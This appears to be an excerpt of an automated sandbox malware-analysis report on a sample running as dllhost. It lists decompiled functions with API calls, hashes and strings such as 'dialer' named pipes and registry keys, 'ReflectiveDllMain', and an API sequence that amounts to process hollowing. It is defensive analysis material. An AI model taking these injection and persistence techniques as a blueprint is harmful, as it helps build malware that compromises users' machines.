                                                                  • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain$dialer.exe
                                                                  • API String ID: 2456419452-213581914
                                                                  • Opcode ID: 2bee834698dc212ad1e7088f0667ade3b93d0654afe3c54c2a62f3891622f4bd
                                                                  • Instruction ID: c88bb7c69995235f0751d37bc2d3b37891dd0b76cd64fd565fb581fb6c90924f
                                                                  • Opcode Fuzzy Hash: 2bee834698dc212ad1e7088f0667ade3b93d0654afe3c54c2a62f3891622f4bd
                                                                  • Instruction Fuzzy Hash: 66C14BF170064186EB66DF23B8807EA37A1FB89BC4F444129EB4A47BA4DF38C985C744
                                                                  Function 0000000140001CF0 Relevance: 19.6, APIs: 13, Instructions: 131memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                  • String ID:
                                                                  • API String ID: 4084875642-0
                                                                  • Opcode ID: ba5697e447d87321b3970d2a80d21a8dae171d7d4a90f8eea2aa6f3ee5ecc7d8
                                                                  • Instruction ID: 28fb11b33fc6f94ec1b72d6715988f9935dfd05350da2d8862b8b96723d9be5a
                                                                  • Opcode Fuzzy Hash: ba5697e447d87321b3970d2a80d21a8dae171d7d4a90f8eea2aa6f3ee5ecc7d8
                                                                  • Instruction Fuzzy Hash: 145169B27116808AEB66DF63F8587EA26A1F78DBD4F404029EF4947764DF38C586C704
                                                                  Function 0000000140002300 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 3197395349-0
                                                                  • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                                  • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                                                  • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                                  • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44
                                                                  Function 0000000140001514 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                                                  • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                  • API String ID: 3993315683-2879589442
                                                                  • Opcode ID: 2b309bef933cfa78f1970bf9c63780987827e412de03e182df68e362c732813e
                                                                  • Instruction ID: 6d7d95916604e4ffecc7df06e5d7207a05ffde36480a44705d0775a9d4fcdff1
                                                                  • Opcode Fuzzy Hash: 2b309bef933cfa78f1970bf9c63780987827e412de03e182df68e362c732813e
                                                                  • Instruction Fuzzy Hash: 6871D6B6310A5086EB12EF66F8507DD23A4FB88BC8F016115FB4D97A7ADE38C554C744
                                                                  Function 0000000140002A14 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                  • String ID: .text$C:\Windows\System32\
                                                                  • API String ID: 2721474350-832442975
                                                                  • Opcode ID: 3c2cac29267c4764876fb0089e5e402af6c2ebc65583537dcb3214cf5c3439df
                                                                  • Instruction ID: dfe9efa62791befa50248ca661271f48b6fe4723356168206a8c879346357553
                                                                  • Opcode Fuzzy Hash: 3c2cac29267c4764876fb0089e5e402af6c2ebc65583537dcb3214cf5c3439df
                                                                  • Instruction Fuzzy Hash: 29516AB230468086EB22DF12F8587DAB3A1FB8CBD5F444215AF4A03BA8DF38C549C704
                                                                  Function 00000001400036FC Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                  • String ID: M$\\.\pipe\dialerchildproc
                                                                  • API String ID: 2203880229-1753684470
                                                                  • Opcode ID: 264f81d3a6ac6bca323ce3fa8054da7710f72da389890086086dd295b32d71a1
                                                                  • Instruction ID: c448ab6558bdd7463f57c5c12a5a219c56a73407a56f172addbd9e8e0ddff9c1
                                                                  • Opcode Fuzzy Hash: 264f81d3a6ac6bca323ce3fa8054da7710f72da389890086086dd295b32d71a1
                                                                  • Instruction Fuzzy Hash: 1C1139F121868492E726EB22F8047EA6764B78DBE0F444225FB9A436F6DF7CC548C704
                                                                  Function 0000000140002CB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 208 140002cb8-140002cc2 209 140002cc5-140002cd8 call 140002300 208->209 212 140002ce5-140002cf2 ConnectNamedPipe 209->212 213 140002cda-140002ce3 Sleep 209->213 214 140002cf4-140002d15 ReadFile 212->214 215 140002d29-140002d2e Sleep 212->215 213->209 216 140002d34-140002d3d DisconnectNamedPipe 214->216 217 140002d17-140002d1c 214->217 215->216 216->212 217->216 218 140002d1e-140002d27 217->218 218->216
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                  • String ID: \\.\pipe\dialercontrol
                                                                  • API String ID: 2071455217-3404160161
                                                                  • Opcode ID: 3209f241eb13f1ef8ec1a4decc378a022141b60f243280a494fd49a09c45b802
                                                                  • Instruction ID: 4aa5465129413e2f39cc36440aa91cbf4e29d23be742ebc323825d4ea6cf5422
                                                                  • Opcode Fuzzy Hash: 3209f241eb13f1ef8ec1a4decc378a022141b60f243280a494fd49a09c45b802
                                                                  • Instruction Fuzzy Hash: 080148B120464082FB16EB22F8547EA6360A79DBE1F554225FB66436F5CE7CC948CB00
                                                                  Function 000000014000363C Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 228 14000363c-140003690 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 229 140003692-1400036a5 K32EnumProcesses 228->229 230 1400036a7-1400036b6 229->230 231 1400036ef-1400036f8 Sleep 229->231 232 1400036b8-1400036bc 230->232 233 1400036e0-1400036eb 230->233 231->229 234 1400036be 232->234 235 1400036cf-1400036d2 call 140003198 232->235 233->231 236 1400036c2-1400036c7 234->236 239 1400036d6 235->239 237 1400036c9-1400036cd 236->237 238 1400036da-1400036de 236->238 237->235 237->236 238->232 238->233 239->238
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                  • String ID:
                                                                  • API String ID: 3676546796-0
                                                                  • Opcode ID: c96deb0488732d85c0e234732b40ab3daafc8955a2b60271e324f420789b4ec5
                                                                  • Instruction ID: 932927f610c79799a7423f6de90e0e5c96436069bf88993b9f6edd8e186454c1
                                                                  • Opcode Fuzzy Hash: c96deb0488732d85c0e234732b40ab3daafc8955a2b60271e324f420789b4ec5
                                                                  • Instruction Fuzzy Hash: B81172B270061196E716DB17F81476A76A6F7C9FC1F558028EF8207B78CE3AD884CB00
                                                                  Function 000000014000200C Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                  • String ID:
                                                                  • API String ID: 1323846700-0
                                                                  • Opcode ID: 9ff41f5b47486c21fa891594cf0c33ae277b6b992257bec1fa520ef4309fdbd8
                                                                  • Instruction ID: c66517cf2b2c161b5e7adf19ff96308ebd974c614c1f63983815515aa541087b
                                                                  • Opcode Fuzzy Hash: 9ff41f5b47486c21fa891594cf0c33ae277b6b992257bec1fa520ef4309fdbd8
                                                                  • Instruction Fuzzy Hash: DD114CB1B0564086FB16DF27B84439A66A1EB8DBD4F488028FF0903777EE39C486C704
                                                                  Function 0000000140002D40 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 252 140002d40-140002d44 call 140002d54 254 140002d49-140002d4b ExitProcess 252->254
                                                                  APIs
                                                                    • Part of subcall function 0000000140002D54: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002D7C
                                                                    • Part of subcall function 0000000140002D54: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002D8C
                                                                    • Part of subcall function 0000000140002D54: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002DA6
                                                                    • Part of subcall function 0000000140002D54: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DBD
                                                                    • Part of subcall function 0000000140002D54: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DF5
                                                                    • Part of subcall function 0000000140002D54: GetLastError.KERNEL32 ref: 0000000140002DFF
                                                                    • Part of subcall function 0000000140002D54: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E08
                                                                    • Part of subcall function 0000000140002D54: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E31
                                                                    • Part of subcall function 0000000140002D54: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E61
                                                                    • Part of subcall function 0000000140002D54: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E91
                                                                    • Part of subcall function 0000000140002D54: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EA5
                                                                    • Part of subcall function 0000000140002D54: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EB3
                                                                    • Part of subcall function 0000000140002D54: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EC6
                                                                    • Part of subcall function 0000000140002D54: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002ED4
                                                                  • ExitProcess.KERNEL32 ref: 0000000140002D4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
                                                                  • String ID:
                                                                  • API String ID: 2472495637-0
                                                                  • Opcode ID: 6a20d8ef6d5d0a33946017a04688fae3853965e8bdf45be2cba163fde7849c19
                                                                  • Instruction ID: 59e064767c250cdef6e9f59bcc282425e560d761e872fe105b4542e7c77ad29f
                                                                  • Opcode Fuzzy Hash: 6a20d8ef6d5d0a33946017a04688fae3853965e8bdf45be2cba163fde7849c19
                                                                  • Instruction Fuzzy Hash: E7A002B0A1159041DA09B77674553D91561575C741F100415611547172DD7844954655

                                                                  Non-executed Functions

                                                                  Function 00000001400031D8 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 236registrymemoryfileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 261 1400031d8-1400031f9 262 1400033f1-1400033f7 261->262 263 1400031ff 261->263 266 14000356d-140003591 ReadFile 262->266 267 1400033fd-140003400 262->267 264 140003205-14000320b 263->264 265 14000335f-140003397 GetProcessHeap HeapAlloc K32EnumProcesses 263->265 268 140003211-140003214 264->268 269 140003356-140003358 ExitProcess 264->269 270 140003626-140003638 265->270 274 14000339d-1400033ae 265->274 266->270 271 140003597-14000359e 266->271 272 140003563-140003568 call 140001f7c 267->272 273 140003406-14000340c 267->273 276 14000321a-14000321d 268->276 277 1400032be-1400032e9 RegOpenKeyExW 268->277 271->270 278 1400035a4-1400035df GetProcessHeap HeapAlloc call 140001cf0 271->278 272->270 279 140003412-140003415 273->279 280 140003508-14000351b call 1400020fc 273->280 274->270 281 1400033b4-1400033ea call 140001860 * 2 274->281 286 140003223-140003226 276->286 287 1400032af-1400032b9 276->287 282 140003327-140003351 call 14000217c * 2 call 140001f7c call 1400017a0 call 14000200c 277->282 283 1400032eb-140003321 RegDeleteValueW * 3 277->283 304 1400035e1-1400035e7 278->304 305 140003612-140003620 GetProcessHeap HeapFree 278->305 289 140003454-140003465 call 1400020fc 279->289 290 140003417-14000341d 279->290 280->270 307 140003521-140003530 call 1400020fc 280->307 316 1400033ec 281->316 282->270 283->282 295 1400032a2-1400032aa 286->295 296 140003228-14000322e 286->296 287->270 289->270 308 14000346b-14000348d ReadFile 289->308 290->270 298 140003423-14000344d call 140002c64 call 140002c90 ExitProcess 290->298 295->270 296->270 303 140003234-140003258 ReadFile 296->303 303->270 311 14000325e-140003265 303->311 304->305 312 1400035e9-1400035fb 304->312 305->270 307->270 329 140003536-14000355e ShellExecuteW 307->329 308->270 315 140003493-14000349a 308->315 311->270 318 14000326b-14000329d call 140001860 * 2 311->318 319 140003601-140003609 312->319 320 1400035fd-1400035ff 312->320 315->270 323 1400034a0-1400034de GetProcessHeap HeapAlloc ReadFile 315->323 316->270 318->270 319->305 327 14000360b 319->327 320->319 326 14000360d call 140001eec 320->326 323->305 330 1400034e4-1400034f0 323->330 326->305 327->312 329->270 330->305 334 1400034f6-140003503 call 140002434 330->334 334->305
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                                                                  • String ID: SOFTWARE$dialerdll32$dialerdll64$dialerstager$dialersvc32$dialersvc64$open
                                                                  • API String ID: 4225498131-1247716241
                                                                  • Opcode ID: 422f40bd223bb63f26ace592334ba55c24233faa36fd25942569ee90e96e746c
                                                                  • Instruction ID: e08a93284e424f9f2f03302153dd23542788a9e373c29e46626a4198fc3bbd5f
                                                                  • Opcode Fuzzy Hash: 422f40bd223bb63f26ace592334ba55c24233faa36fd25942569ee90e96e746c
                                                                  • Instruction Fuzzy Hash: E0B128F1604A8096EB7BDF27F8543EA22A9F74C7C4F458125BB0A47AB6DE798605C700
                                                                  Function 0000000140002434 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 324injectionthreadmemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 343 140002434-140002465 344 140002922 343->344 345 14000246b-140002478 343->345 348 140002924-140002937 344->348 346 14000247a-140002484 345->346 347 140002490 345->347 346->344 349 14000248a-14000248e 346->349 350 140002493-140002496 347->350 349->350 351 1400024d5-1400024d8 350->351 352 140002498-1400024b6 call 1400020cc 350->352 353 1400024de-14000253a CreateProcessW 351->353 352->344 367 1400024bc-1400024c8 352->367 356 1400028d7-1400028df 353->356 357 140002540-140002557 353->357 358 1400028e1-1400028f2 OpenProcess 356->358 359 1400028ff 356->359 360 140002718-140002755 call 1400020cc VirtualAllocEx 357->360 361 14000255d-14000259b call 1400020cc VirtualAllocEx 357->361 363 140002902-14000290d 358->363 364 1400028f4-1400028f9 TerminateProcess 358->364 359->363 374 1400028d1 360->374 375 14000275b-140002777 WriteProcessMemory 360->375 361->374 376 1400025a1-1400025bd WriteProcessMemory 361->376 363->344 368 14000290f-140002916 363->368 364->359 367->344 371 1400024ce 367->371 368->353 371->351 374->356 375->374 377 14000277d-1400027a1 VirtualProtectEx 375->377 376->374 378 1400025c3-1400025e7 VirtualProtectEx 376->378 377->374 379 1400027a7-1400027b5 377->379 378->374 380 1400025ed-1400025fb 378->380 383 140002846-140002865 VirtualAlloc 379->383 384 1400027bb 379->384 381 140002601 380->381 382 14000268c-1400026ab VirtualAlloc 380->382 385 140002604-140002626 WriteProcessMemory 381->385 382->374 387 1400026b1-1400026c8 GetThreadContext 382->387 383->374 388 140002867-14000287d Wow64GetThreadContext 383->388 386 1400027be-1400027e0 WriteProcessMemory 384->386 385->374 390 14000262c-140002637 385->390 386->374 391 1400027e6-1400027f1 386->391 387->374 392 1400026ce-1400026f2 WriteProcessMemory 387->392 388->374 389 14000287f-1400028a1 WriteProcessMemory 388->389 389->374 393 1400028a3-1400028b7 Wow64SetThreadContext 389->393 394 140002639-14000263d 390->394 395 14000263f 390->395 396 1400027f3-1400027f7 391->396 397 1400027f9 391->397 392->374 398 1400026f8-140002713 SetThreadContext 392->398 399 1400028bd-1400028bf 393->399 400 140002643-140002672 call 140002938 VirtualProtectEx 394->400 395->400 401 1400027fd-14000282c call 140002938 VirtualProtectEx 396->401 397->401 398->399 399->374 402 1400028c1-1400028cf ResumeThread 399->402 400->374 408 140002678-140002686 400->408 401->374 409 140002832-140002840 401->409 402->374 405 14000291b-140002920 402->405 405->348 408->382 408->385 409->383 409->386
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$CreateOpenResumeTerminate
                                                                  • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                                  • API String ID: 1423830022-1371749706
                                                                  • Opcode ID: bb03c724c0a37b745e04d1c2cc94b97180df235d5c9c7911ccdb9c72fcca1860
                                                                  • Instruction ID: 66eadde3e23c78db0b2c2a162faeb5bceed69f312705dc0718e950d303e6fa69
                                                                  • Opcode Fuzzy Hash: bb03c724c0a37b745e04d1c2cc94b97180df235d5c9c7911ccdb9c72fcca1860
                                                                  • Instruction Fuzzy Hash: 94D17EB670164187EB61CB67F84479AB7A0FB88BD4F004025EF8947BA4DF78D599CB04
                                                                  Function 0000000140001274 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 136memoryregistrystringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                  • String ID: d
                                                                  • API String ID: 2005889112-2564639436
                                                                  • Opcode ID: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                                  • Instruction ID: cbe0a9e96035c6652df35f1bebe582e7c0167c489293dce8c24ece8bd57d0938
                                                                  • Opcode Fuzzy Hash: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                                  • Instruction Fuzzy Hash: C35128B2604B8486EB56DF62F4483AA77A1F78CBD5F444124EB4A07B79DF38C555C700
                                                                  Function 000000014000217C Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                  • String ID:
                                                                  • API String ID: 4184240511-0
                                                                  • Opcode ID: 52a031b336cdca2811222aac7cadf92182542813affb2ed5c5bed703cbbb13aa
                                                                  • Instruction ID: d557f572b548448d46b4b4e400aa3a3f0eed60a23b27f74265f55533597505c8
                                                                  • Opcode Fuzzy Hash: 52a031b336cdca2811222aac7cadf92182542813affb2ed5c5bed703cbbb13aa
                                                                  • Instruction Fuzzy Hash: D14148B2700A859AE711CF6AE8843DD73B1FB89B99F445225FF0A43A69DF38C159C304
                                                                  Function 000000014000104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                  • String ID: d
                                                                  • API String ID: 3743429067-2564639436
                                                                  • Opcode ID: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                                  • Instruction ID: 42b997484051ce9e6daf6bc3104cf1544be02307d9272190f1dec121864cc25c
                                                                  • Opcode Fuzzy Hash: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                                  • Instruction Fuzzy Hash: E1412AB2214B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
